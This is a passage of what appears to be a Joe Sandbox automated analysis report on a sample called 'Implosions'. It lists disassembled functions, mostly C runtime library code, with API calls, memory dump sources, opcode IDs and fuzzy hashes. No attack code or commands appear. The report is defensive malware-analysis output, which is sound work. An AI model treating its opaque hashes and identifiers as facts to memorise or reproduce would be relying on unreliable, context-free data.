                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
              • ___removelocaleref.LIBCMT ref: 00414717
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
              • ___freetlocinfo.LIBCMT ref: 0041472B
                • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
              • String ID: @.B
              • API String ID: 467427115-470711618
              • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
              • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
              • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
              • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
              Function 05CAA2D8 Relevance: 6.7, Strings: 5, Instructions: 403COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q$(_^q$Hbq$Hbq$Hbq
              • API String ID: 0-2986095749
              • Opcode ID: d679e7851a117be795339493460135d1ec6754fe429e405bc7945e689b20c3c4
              • Instruction ID: d1bcee8c522c135b6ad742900849f51e63ee6163c2c07fbe4b720b0043d757e4
              • Opcode Fuzzy Hash: d679e7851a117be795339493460135d1ec6754fe429e405bc7945e689b20c3c4
              • Instruction Fuzzy Hash: 55E1A135B04345AFDB05ABB884246AE7FB6FF84300F648569D905DB381EF34E902CB95
              Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __fileno.LIBCMT ref: 0040C77C
              • __locking.LIBCMT ref: 0040C791
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __decode_pointer__fileno__getptd_noexit__locking
              • String ID:
              • API String ID: 2395185920-0
              • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
              • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
              Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _fseek_malloc_memset
              • String ID:
              • API String ID: 208892515-0
              • Opcode ID: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
              • Opcode Fuzzy Hash: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
              Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
              • __isleadbyte_l.LIBCMT ref: 00415307
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
              Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89